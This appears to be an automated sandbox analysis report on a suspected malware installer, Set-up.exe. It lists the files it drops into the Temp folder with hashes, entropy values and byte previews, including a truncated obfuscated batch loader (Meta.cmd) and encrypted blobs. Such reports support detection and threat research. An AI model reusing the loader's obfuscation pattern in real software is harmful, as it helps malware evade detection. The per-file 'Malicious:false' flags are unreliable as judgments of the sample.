                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\Adaptation

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):73728
                                                                  Entropy (8bit):7.997706452675528
                                                                  Encrypted:true
                                                                  SSDEEP:1536:ws5BpS+2C+k3zZDHu0GXZpgiNqQBfWSBTs600DUvjYY3:ws5tx3dTu0GXZzBlWCP+z
                                                                  MD5:76675957DD86279BC04D41ADBACCB6E9
                                                                  SHA1:88B258FAB8C6674765487C1AF85A6E344268962C
                                                                  SHA-256:03CDBED2C80479AB8CBD722375FBD8B41B35BB502EDB399CD965DD2808000B1F
                                                                  SHA-512:D0AD26CAB0CED61E6067C1BEB22CE5BDD405B4AFBB8731796C729300CFEB450373930C38E039462C2C6FA1A7775536F24947330CA9175CF17AC27E46DF8972C4
                                                                  Malicious:false
                                                                  Preview:.e.[.V....S..3G ./.F...F.aE..L....p....|..;.5....u..yHE...2..h.w@tf............C.}...7...n.c^%V.F.<....$lh...).[&`Q..,d.c-....v.,.<..[...>.\.S ..N......r..#.-...A>+.50..o...:....ml....c..{.F<.....}....L.....;.I\.....^....c.n...R....|.}O$.i.R{m..(.....C<8....{.?..>.J!..:....&.j[D.Q......*....p&%.....8.e.XKd.........3..x......q{bM".;:.:.|l....nB......~n..."...<..g....A.@.......G'xt.O+.T.k........i .V.m.{.S...(jyO.k.`3..).($.jcs...Q...I90..|.sQ......M...^l-.....S.FT^ 5 .......*..'%.>..x..1K_.=k.$ZpC.L)?.w*T6..AuW..z.!%^#(.K....h..`........#..c..*.EV..L.+.....;.......P@...=....N.)..i.'&..%.4.k...+.S..}7..<..g.-F.Di...7;.y.x(\.G.2.N......Ne....Y.....B...e...........k.%mO....O.6...z....y#..x.....d.rYH..M......|=. >T.yp7..^G.?n...d..aj.....XsNX.................>.c.(......FJ.o8.e...o0E..0...C......].X.Dp......A...id.....X 9!>j......K.4.Y2..+,O.j..!q...e..m.(}.u....S..Ea.RrH.`..O.m1.=..u.\...'|....TS\7.?.yM..O....^.........../.........d..m.

                                                                  C:\Users\user\AppData\Local\Temp\Algeria

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):145408
                                                                  Entropy (8bit):5.79459291437204
                                                                  Encrypted:false
                                                                  SSDEEP:3072:i6whxjgarB/5elDWy4ZNoGmROL7F1G7h9:i6ggarZ8aBZ2GmRq769
                                                                  MD5:CB3F61555E6E80800414BABCF373E6B1
                                                                  SHA1:2D03D3CA973C54C61D375EF77A52F2C4FAF8FF73
                                                                  SHA-256:190F6D0B0A42379D2998F0F508E6687B8538F726D137364AAAF90AD42855A346
                                                                  SHA-512:F4E13BAAAED72A87857B935E5365956BEA9D1F581EFAE0359AF8813988E5A081BE14C5BAE1E43E4A372A98A56D19F2E989376419A6F87F1EED2AE277D77605D3
                                                                  Malicious:false
                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\Departmental

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):93184
                                                                  Entropy (8bit):6.655760669778657
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ir5C03Eq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkBvRmLt:I0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8d
                                                                  MD5:8D19BA83912ED7E0BF2680D626D8E9C1
                                                                  SHA1:B997ABCF4F35067ADFBF4F2811613A4A0A164418
                                                                  SHA-256:349BB7DC095DA2539C5D65E6967ECDE73F9A7ACCE074723AE5E10007297BE0A2
                                                                  SHA-512:36FCA6294BB657DD0B75CE6CA0BB452349DD1628D956AD2329CA658CE3501154307DD201DD4F663D2B690996712426DB15C8C756251B2128815030A8C176545A
                                                                  Malicious:false
                                                                  Preview:.Q.....W........_^..[....U....SVW.=H.I..E.P..E.Ph.....u..6..E.;E.sv3.SSj..6.....tf;}.ra;}.r\3.w.j.Z...........Q....YP.E.E.Vj..0..H.I..u..t..E.;.t.3.f..F.E..M...FP.h`....V.m...Y....2._^[....U....SV..M.h.kL.....Q.E..P. ...M...F.....t..C....,h.kL..M....Q.E..P. ...M.........t.......E..0j.Q.6..H.I...t.....2.^[....U....SV..M.h.kL..i...Q.E..P.1 ...M........t..D....,h.kL..M..;...Q.E..P.. ...M.......t......j..u.P.6..H.I...t.....2.^[....U....SV..M.h.kL.....Q.E...P.....M....@.....t..X....,h.kL..M....Q.E...P.....M..........t#......E..0j.Q.6..H.I..M......t.....2.^[....U....SV..M.h.kL..]...Q.E...P.%....M........t..F....,h.kL..M../...Q.E...P......M........t......j.j.P.6..H.I......^[..U... SVW..M.h.kL.....Q.E..P.....M...;.....t..G....E.H....x..:h.kL..M....Q.E..P.r....M.....................E......x.3.SSP.6..H.I..E...tbSPW.6..H.I....tR3......j.Z.........Q....Y..W.u..u..6..H.I..M....u.h..I..i]....W.a]....W.f...Y....2._^[....U....SV..M.h.kL..u.....Q.

                                                                  C:\Users\user\AppData\Local\Temp\Engaged

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):99328
                                                                  Entropy (8bit):6.690441421220131
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3u2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4C7:DcBiqXvpgF4qv+32eOyKODOSpQSAU4C7
                                                                  MD5:25E2B7A47F1DE3BE1A2391FE8B5A361D
                                                                  SHA1:6106FF39717B2010F3E98502664A6BE456101D15
                                                                  SHA-256:D134E48042F0F548C1D84266B1204062222514E2F85804738D0686EB54520BCF
                                                                  SHA-512:CA51579F7A3189735B30538598BFB7ADE53866901F965C8247AF56CE65D3706015D525E20AC7639B7D9CFD9379729F7B2D011793D85FE9F7EF118D9CE2C1BBB8
                                                                  Malicious:false
                                                                  Preview:3.@].3.].U..M..U.V...q....x..I...........^].U..E....8RCC.t..8MOC.t..8csm.u!.1....`...;....#....x..~.......H.3.]..U..E.f.....f..u.+E...H]..E.....U..E..U.V..+....f....R.f..u.^]..U..W...M..G....t....G..A......M...u....L..G....L..G..DV.....W...R.w..HL...HHP.......V.7............P...^..u......P....G...._].....U...M...uu.U...u...................].M...t.SVWjA_jZ+.[....f;.r.f;.w... ..........f;.r.f;.w... ......f..t.f;.t...._...^+.[].j..u..u.........]..U.....M.SV.u.......]...t..u...u...........................E.W.......uBjAYjZ+.Z...3f;.r.f;.w... ..........f;.r.f;.w... ......f..t:f;.t..3....M.QP....M........[.QP..........v.f..t.f;.t.......+._.}..^[t..M...P.......]..U....L....j Y+.E...3...L.]..U..3..}.csm....].j.h.L.......u...u..B.....t..u..z...Yj..f...Y.e...=`.M........3.@.X.M....E......}...u<....L.....j Y+.3...3..\.M.;.t.3.3.PPP.........I...h..M......u.h..M..8...Y.e....u.h..I.h..I.....YYh..I.h..I.....YY..u...`.M...E......'.....u,.u..*....E...0.........e......u

                                                                  C:\Users\user\AppData\Local\Temp\Failure

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):66560
                                                                  Entropy (8bit):7.997490138619586
                                                                  Encrypted:true
                                                                  SSDEEP:1536:FY1ygGkFzfKSCIahzo/0hVqmjStVaBLiJ:C0Fk1CvQ0hVqr5
                                                                  MD5:610C020F5B30963C91E6A6C46571BEEE
                                                                  SHA1:A126FC782787FFB4B2241615184D8505271F0A0E
                                                                  SHA-256:31334A85C77EA9C71978CD1ACCFC814A3103B5AC5341D05E5B394E78211D92FA
                                                                  SHA-512:D0EF1134F32CC2923D70F9E11290DCF5B5B0301F2B6B1E6B70E64B04DF076281ABA526E6165058A6B059418678817465AB65ADCD7AEC2D0A542F7A05F845B391
                                                                  Malicious:false
                                                                  Preview:C.$..:lMJ...f..g...j......dm."....8..*.C.=.6H..N.........+9e..@t\.mzN_..S.!.&...O....;...2.q?....L..p..........S.&x..H.Z...........zs....f[.J...@3.PO...P.#Ekb...B.../.E......".<.........}Uc{U..+}..H....Q..'6.fY@.Y..;.I..h.HD....W.5.*.:.J.*.".b.J....j.M..k@j.T.b+..w..#..8..A......'.`...H.:.9.}..,.m..E.#.?..x....}u... r).R....3..a..P....C...B.p.J.1[lb..5[......))9.Hk..s....q..h..^W4..z..".&........FMx.Z.;...w...=eX..h.|.....s.D_.7..A....dp.}.Nyl6.-y.s........9W"]J.l.....<G.lXhe|...eR(..\Q..s...5I..T..g.\........h...k..'..+,.^...T..q.W.6|..5.].wH....r.{.....$.?....a..R...^.7.!4......^.....H.Y.s6.}r.........;..9aY(9........)...-.H.@..7$L..&...S{.sH..L..V]..Z.M..6....k.BI.......c...L..9.I.V....}uuv.!.Zf..;+Q.....-l.1........*U....o.$.]uo..t.`.T!.....|{...NK..i.u.'e..~W..k.S.u..{..|B......}R.W..^..W.@f_....KX....&.Q...I'.9.J.0[..^t.l...qE".9`.3.6....A..".e...@h....~&.]....h.5l...}I@Q.b....%U...9....ob.s...~.r2V.:W...*O%.~.-...C.....p.zID...)

                                                                  C:\Users\user\AppData\Local\Temp\Flour

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):145408
                                                                  Entropy (8bit):6.429896890473934
                                                                  Encrypted:false
                                                                  SSDEEP:3072:8g5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjq:/5vPeDkjGgQaE/loUDtf0aq
                                                                  MD5:16A217FD407A0158CAA76FAFB2392645
                                                                  SHA1:1B5197DD6287AB8AFC23E99C0B6A683443446665
                                                                  SHA-256:80F86A8DE3EC72E0124F49E117FFB4DA840F84D83DA1ED3AC8E57D4756BBC62C
                                                                  SHA-512:AA9CA77E42D6F75213B0382F0DD3523D26B7D14FB9E9485D0BB8153F8F61F83FC02F8D25EC27936E82D6605F26EB295B38683B7DC799114409CE3458254848C1
                                                                  Malicious:false
                                                                  Preview:.u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a.........

                                                                  C:\Users\user\AppData\Local\Temp\Meta

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:ASCII text, with very long lines (1075), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):24166
                                                                  Entropy (8bit):5.109790852529884
                                                                  Encrypted:false
                                                                  SSDEEP:384:CFwkxzxdScQMXlOJpAVkYazLiZcfbHwVjkupPZtA4urmhcxWwYNz+LKb7:Cu41d7pXsJ2VkNLBsVjku1Z2DmhcxWrX
                                                                  MD5:6CF8C1E8CF33FF3268F0418B4C5271F0
                                                                  SHA1:F3442F53493B20FB3A6AB9C15653273F4E7FA231
                                                                  SHA-256:8EDE0AEEEC16358D1784B3939803A648E1172A82B78F8AF7118332016BA7D859
                                                                  SHA-512:7872628CEC9732E614304BFFA3520D4D11240E0973EFF88E54E8C529198457DE744F4B56C4A955A0C67876BE8DEEDF1B1256B78379ED5DC140D25716FC36F771
                                                                  Malicious:false
                                                                  Preview:Set Suburban=j..voiNHandy-..WdMechanical-Temperature-Paintings-Porno-Contains-Bone-Exceptional-Dude-..QzSqJay-Strip-Sprint-Gotta-Antenna-Broke-Weapons-Percentage-..WmHarder-Cj-Granny-..gtvTier-Heath-Occupation-Cartridges-Animation-..dmMats-Mask-National-Classroom-..gkSupplier-Thesaurus-Continued-Supported-Throughout-Resolve-..Set Sending=/..rIoDProvince-Meet-Treaty-J-Track-Rankings-Ignored-..fxbTired-Hot-Weed-..fFUDetected-Teens-Wildlife-Book-Fri-Academy-Which-Fist-Fancy-..pLTucson-Stopped-Cancellation-Copyright-Rings-..vTERelaxation-Minor-Flexibility-Races-Everyone-..sODuring-..nQDQToronto-..tihlSitemap-Whenever-Mongolia-Sql-Eric-Lottery-Wearing-..wIsMail-Administrators-Earned-..sZhIllustration-Southwest-..Set Homepage=M..ndCw-Goods-Garmin-Pix-Simpsons-..FiyColon-..rJlRow-Streams-Metropolitan-Desktop-Strategies-Spending-Choose-Cooper-..VeVCharacteristics-Av-Composition-Matter-Guides-..RuiDEngines-Spencer-Thin-Shorts-Posted-Farmers-Enabled-..kqkTook-Balanced-Office-Golden-..oyKid-Poste

                                                                  C:\Users\user\AppData\Local\Temp\Meta.cmd

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:ASCII text, with very long lines (1075), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):24166
                                                                  Entropy (8bit):5.109790852529884
                                                                  Encrypted:false
                                                                  SSDEEP:384:CFwkxzxdScQMXlOJpAVkYazLiZcfbHwVjkupPZtA4urmhcxWwYNz+LKb7:Cu41d7pXsJ2VkNLBsVjku1Z2DmhcxWrX
                                                                  MD5:6CF8C1E8CF33FF3268F0418B4C5271F0
                                                                  SHA1:F3442F53493B20FB3A6AB9C15653273F4E7FA231
                                                                  SHA-256:8EDE0AEEEC16358D1784B3939803A648E1172A82B78F8AF7118332016BA7D859
                                                                  SHA-512:7872628CEC9732E614304BFFA3520D4D11240E0973EFF88E54E8C529198457DE744F4B56C4A955A0C67876BE8DEEDF1B1256B78379ED5DC140D25716FC36F771
                                                                  Malicious:false
                                                                  Preview:Set Suburban=j..voiNHandy-..WdMechanical-Temperature-Paintings-Porno-Contains-Bone-Exceptional-Dude-..QzSqJay-Strip-Sprint-Gotta-Antenna-Broke-Weapons-Percentage-..WmHarder-Cj-Granny-..gtvTier-Heath-Occupation-Cartridges-Animation-..dmMats-Mask-National-Classroom-..gkSupplier-Thesaurus-Continued-Supported-Throughout-Resolve-..Set Sending=/..rIoDProvince-Meet-Treaty-J-Track-Rankings-Ignored-..fxbTired-Hot-Weed-..fFUDetected-Teens-Wildlife-Book-Fri-Academy-Which-Fist-Fancy-..pLTucson-Stopped-Cancellation-Copyright-Rings-..vTERelaxation-Minor-Flexibility-Races-Everyone-..sODuring-..nQDQToronto-..tihlSitemap-Whenever-Mongolia-Sql-Eric-Lottery-Wearing-..wIsMail-Administrators-Earned-..sZhIllustration-Southwest-..Set Homepage=M..ndCw-Goods-Garmin-Pix-Simpsons-..FiyColon-..rJlRow-Streams-Metropolitan-Desktop-Strategies-Spending-Choose-Cooper-..VeVCharacteristics-Av-Composition-Matter-Guides-..RuiDEngines-Spencer-Thin-Shorts-Posted-Farmers-Enabled-..kqkTook-Balanced-Office-Golden-..oyKid-Poste

                                                                  C:\Users\user\AppData\Local\Temp\Palmer

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):152576
                                                                  Entropy (8bit):6.663046297494578
                                                                  Encrypted:false
                                                                  SSDEEP:3072:Q0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPn+:xbfSCOMVIPPL/sZ7HS3zcNP+
                                                                  MD5:12935A95CAE9F662778657E407E94AF0
                                                                  SHA1:BD6258D1BFBE93879A9B0D6B68389855DDD3CB23
                                                                  SHA-256:42A0C86D3ECD34DE1A7A163AA40FE30DCF1BC1FFC5FA073396093F239E5D38D0
                                                                  SHA-512:959555E08F86A0CD5CA87D019D2716967A28FAC69BD1988ABEFB26E362E3E8276F4F7D2B08380B2DBD6E2F5289119EF273B79D58890E54FFD7D847D224EAD74A
                                                                  Malicious:false
                                                                  Preview:..............s.....L..D..B..A.;.v....9.u.E.G....E...r.S.^..F....................E..N.j.....L._f...R.f...I....u.V.....Y3._.M.^3.[..=....].....I..."M.....I..."M.....U..U.W3.f9:t!V..q.f.....f;.u.+.....J...f9:u.^.B._]..U..QSVW....I...3...tVV....YWWW..W+...SVWW....I..E...t4P..j....Y..t.3.PP.u.WSVPP....I...t...3...3.W.[..Y.....t.V....I._^..[..]..VW....I.....u.3..7SV.+...+......S.i....YY..t.SVW.?.....j..6[..YV....I.[.._^..U....S.]...u..$$............|VWj=S...S...E.YY..tN;.tJ.x...5..M.....E.;5..M.u.V........E.Y.5..M.3........9].t/9...M.t'..N....un.#...........W.Z..Y_..^[..]..t.3...j.j...}..S...M..kZ...5..M......t.9...M.u%j.j...}..S...M..BZ.....9...M.t..5..M...t..E..+.PQ......E.YY..xH9.tD.4...Z..Y.M.8].u..E.........D.....A9..u.j.QV.HX..S....Y........tX.P8].........E..H.;............?......j.QV..X..S...Y..............M....E.....\...5..M.9].........Q...A..u.+.j..A.P.E...|....YY..tG.u..u.V.aX.......u@.M..+E.A....E.......Y.#.PV....I...u...".......*...V..X..Y.a...SSSSS."W

                                                                  C:\Users\user\AppData\Local\Temp\Pokemon

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):92160
                                                                  Entropy (8bit):7.998030289737678
                                                                  Encrypted:true
                                                                  SSDEEP:1536:aAqOFRquxUx35ulvTNAH1LRnUgozIuLqSn6dwY2SB8o9cVhQ:aABFVUx8vIaz9LqRdw0MS
                                                                  MD5:A41C631A6A1C5029B513E05AC4B47CDB
                                                                  SHA1:EF404CF768C93E4424E2B84B72760A83DCEC5F56
                                                                  SHA-256:FEB1AD54CBDA36BC625D8C6E5A72C266A9960188D5B56047944D77C6F0974301
                                                                  SHA-512:13189B01278A946B4E7EFF731E8220B5B909782A8BD95CE73E61C3A9E56C9D4CBCEE2D3CA30F41CAD1B6B2EDFEACBF301D46459F80F06E7C08AF56AB76287D6F
                                                                  Malicious:false
                                                                  Preview:..Y...C+..~.K1...4..0.....?.'-......B.]RY....*..|0d.E\....he.. ....1...jD..|OJ....{%....a*2..e.(.ky..V..[.W._.....m.sR...`f.:x...2..:..T!....4...F..:D(.....Sv......A......../.[Y...K..u...2.........|%...pk.......^.2..Q.....%X.....E0f.l..M..C.U$..i..".\...zm.O%...qO4.CK..8.......T.4...p.\ldZf.r.......x.y...%...~2.i....2..'X.e.}{.._".P.$~.n.].c;..#...h..$.:O...:.2.).!...%......u..a.n......p...j...m...|.a.SJ.D...f...d+.;.q+.?AY..C..~.K..d.....=.w...>..?./../...h.."..rd..6.*9{.5..`.x..F.a}....8.X..W."..P.6......L&...4...0.?..........l...N6.......<A.-.M.Y..........s...G.7.."\....$w..... .ddO81..[..<vu.~..>.<..y....w..T.kp...hP.~A5.)...XS....I(....)6|!...3.J."...'....Ta.]y..7...v.z...Q7..&.A]...WH..".Rfv....w...._0.K.9.{=.G,.iRz...G.......1...U...$.}.. .T.hx.p|...s.W&.T....e.O]..b*.}1..n..9pPgC...w.....?...d...fY.~.D.9.}..yc.\R..e.....l-..#W.Z......q...Q2.P..;v........#..t^9....l....x.L\...~......v.v.....UJ.d):.C.M..;u.........aI.5)...a....w.|.

                                                                  C:\Users\user\AppData\Local\Temp\Ran

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):78848
                                                                  Entropy (8bit):6.25908922667261
                                                                  Encrypted:false
                                                                  SSDEEP:1536:6+r5bLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6x:Z5bLezW9FfTut/Dde6u640ewy4Za9cok
                                                                  MD5:D6AC1143E612A941B43CABBCA154D956
                                                                  SHA1:D12A95374EA9826D0358F8E76DE1907F5B7DFF85
                                                                  SHA-256:74005C4C3C009D1E088A2CB9FA7FD964CDC1F2AC519C45B6C26EC200C6159313
                                                                  SHA-512:7FF349EE3F112FFC267CC610C77B13E782127E3F41502168D32464F87C01DA228A3D5F8873E6B1BC766D5FB520074A3248E3F6D20AD194CB85C8F732464E2722
                                                                  Malicious:false
                                                                  Preview:.t..v..n...^...v..C..H..............)M...)M...<.._3.[]...U..E...4.@.SVW.p.....~..u..E.P.....3...F3.]..../.....N..E......A....E..A..E.A..M.U.E...3..A..E..A..E.A..U.E....}..t..M..w.....t..M..k....E..@..p.......F...f9.tJ.E..P.......u;.u....@...3..B.V....H..|9...D9.t..@8.P..|9...D9.t..@8.X..+.E..M.Q.@........P.D....u..........3.>B.V..M....._^3.[....U..S.]...*M.Wh..I..{..%.)M.......t .C.V.0.........*M.9N.t..v......^...v..C..H..k............)M...)M......_3.[]...U..E.3.A.x..v..@....4.....Q.....]...U..=h#M..VtO.=e#M..uF.E..x..v".@..0...0...h....j..v...*M........h..I...*M.......)M...b...=...P..|....D..t..@8W3.G.x..|....D..t..@8.u....@.......&..~._3.^]...U........d$..S.].V....L$.W.{..t$..t$...t..C..0......F....B...D$.......v..K..I..1........v..K..I.......D$....v..K..I.........D$..M.3.}..\$.+.t....u/R.t$.VSj...P.t$.VSR..)M..k............7.G.............u0.T$....H..|....D..t..@8.@......|....D..t..@8.@..S.w...Y_^3.[..]...U......$S.].VW...C........0....C..p....y....

                                                                  C:\Users\user\AppData\Local\Temp\Related

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:OpenPGP Public Key
                                                                  Category:dropped
                                                                  Size (bytes):64073
                                                                  Entropy (8bit):7.997360789037331
                                                                  Encrypted:true
                                                                  SSDEEP:1536:1rLmAJMiFZJ3ZvTx81wfV+qOCKiEwt/GdN:1GKMirvTx81wN+0KiXCN
                                                                  MD5:E2B7240843E9CC6858902BA21EE0C224
                                                                  SHA1:967A6A5B3BF85002D5A0D2D0D39FB9F121F0A33A
                                                                  SHA-256:C73576567AC26F6AF0D704DD1B586E325CBFCAB2A4AA0F469FAF3CFC211C4AD5
                                                                  SHA-512:3780A635FF2004BAEE21B896C5237B318E3A63BFFCB7DA8FCC4D3FC0E6FAA3ECBF79C981CA5D1F2251294E4A019B7C5AC4353269F6E1676701D7084BFC14A510
                                                                  Malicious:false
                                                                  Preview:.M.j-...yso[.L.n.kcr.K..B...M.n...B_....<....@.G..*..M.1.\K/?..sT...]-.u[h;.<m$8.z...=.!....N..>..Bm<.IIi|-...to.-..l...........?8...;.[..8g....xW.#.~..K...n.._...4Y..4.4X....Gs)I&...s..L>..i.d.B.......#...w..}...b..h........j..0.A....H.7Ykv.../@..uu..3...]m...(........<......O.....%.q;=...%~...*.cSn..[`_.....$......e..6..!.aE.0Nb.E.3.L...^...Z.."e....L......33:..~....MP.e\x.W.`;%...1...t.B.....|}....0.BX...<....cu.<J...F..Q.....OTK[H..g......%G.."...s..R.?.=..^...(k..K.a'..Z..?&...D.......x.6bm......U.>q..v.9...w".9.F.uo..J.LK....L}.........AeEy...%......fJ.3n..*.9..y>h....!.S..F....~......[..zAa`rP.C.....J.D.#.<?~.......K...M9?..l...$....)P.i..u.i.|.Hsy. ]..*8. N......I9..r...A,U..!r0K.Oo...........V5.....tn...P`..`.....dz....k..,......x(v@..`oc=a ..TO...7....%a.....sj.@.W?.1..o..`......a.Z-.{Mw>..T.$2L.J.1....n.j..Y.....\(o..vDlZ...(].v...7.E.kK.k..wh.`.2..Nw.T.-"...'...f_0.PH...F...mR....<....x..k.7.W......v..f.P.M.C^..7Y<.Z.. z..<

                                                                  C:\Users\user\AppData\Local\Temp\Relaxation

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):2155
                                                                  Entropy (8bit):5.135657840662447
                                                                  Encrypted:false
                                                                  SSDEEP:48:w9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxk:MSEA5O5W+MfH5S1Cqi
                                                                  MD5:76DCBF84A140817BF8B1599E50B7C376
                                                                  SHA1:72B61225D799324EAABE1A7E643551E8141E90B3
                                                                  SHA-256:B3FC89D82E79CBE020B53A8563F508E6A9DB69125A67BA3662D854387ADC6378
                                                                  SHA-512:B059B70E846C3A60F00263B31DBDECF97CC675189168A540631CC794CF5B7C460AFF9A445B49171F90E593F2C9410C0F46D8690AF5DA1507EFCF19811D73F727
                                                                  Malicious:false
                                                                  Preview:Supervisors........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.....................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\Rounds

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):93184
                                                                  Entropy (8bit):6.565760082561896
                                                                  Encrypted:false
                                                                  SSDEEP:1536:GpmESvn+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiou3:GpmESv+AqVnBypIbv18mLthfhnueoMml
                                                                  MD5:137389ECE9692772A7AA40E2EFA5C47B
                                                                  SHA1:6E4F235394893827BE12D39FA3D57522712BB53A
                                                                  SHA-256:3F95B5C6112D9BB86308CB79A08EA32CE36A78DAA5D22E6860E9291FD4B91E00
                                                                  SHA-512:5FE63158D304EDE52017EB4A9AE336E572C23A23A9C16BA34E8A1B68D53FA8D29189759E93A16D137CF8D3F54982B1531DCB11126D2812B914433D98FB0E62D4
                                                                  Malicious:false
                                                                  Preview:...j...p....3....\$....Y.C..C..C..C...9D$........L$ .....q..;u.97u....}..=u.....u...u..F..w..G..cf..u^j.Xf..q3.9G.t7..u33.w.Cf9Tq.t6j..^p..3.Y.N..P..P..P..P..G......L$ ..3.F....W..W..W.3.f9Dq.t.F;t$...g.....\$..\$.....T....}............u..?.|$...3....D$.j..F.Pj.W.....3..t$8PP.D$H.D$@j.PW.D$X...........$.L$(..U...L$8..-...L$(..-...|$ .........D$.....j.3..L$<P.#....C..L$8+.P.3W.a....D$8P.L$\.K...3.P.t$..D$`j.P.t$$.X.......L$X.T..j.3..L$,P......C..L$(+C.P.s.W......D$(P.L$l.....j..t$..D$pj.P.t$$.........L$h.:T....[.j.P..n...D$.YY.....A....L$(..+...L$8..+..._.L$....@....x...H.t..I8.A......x...H.t..I8.|$ 3..A..*...@...x...H.t..I8.A......x...H.t..I8.A...D$$.(.u.j.P.7n..W.xn......L$H.*.._^3.[..]...U......LSVW...L$8.9,...E..@..0...w....N..T$8.....h......n..YP.L$$.....\$ j.^.t$8f.s.h....S....I..D$.....W...f9s...M...j..m....3.Y.L$...\$...s....s..T$..3.D$...~J.\$ f94{u7@.z.j..D$.Xj.f..{.bm..Y.L$...T$..p..p..A..O....D$..L$.G;.|..\$..}............u....L$.....t$..|$..G.Pj.Q./...3..|$4@

                                                                  C:\Users\user\AppData\Local\Temp\Singh

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\Set-up.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):61440
                                                                  Entropy (8bit):7.996586600321405
                                                                  Encrypted:true
                                                                  SSDEEP:1536:tgSHd4eY91LVmfXnEGw5QErkHgjnVOio6luZp9QuOGfnkLe1g:dy6f0Gw5kx16+9PkLe1g
                                                                  MD5:A357578A890C3F2C9784C82330A0CDD9
                                                                  SHA1:D6DC32253605AA3BE5779B5A29E689D83433F0C3
                                                                  SHA-256:51D25BA0D61FAB3735AB88007D32D70C164643270E095AAFAE34CC74AB582230
                                                                  SHA-512:B3B51674747B82867D50F53745264DDA6F5839F441914C55DE3B23954DC84DDDACA05D64983F90F1B717059A2B83C6400C3540142B46EB231161FE38105D3B3B
                                                                  Malicious:false
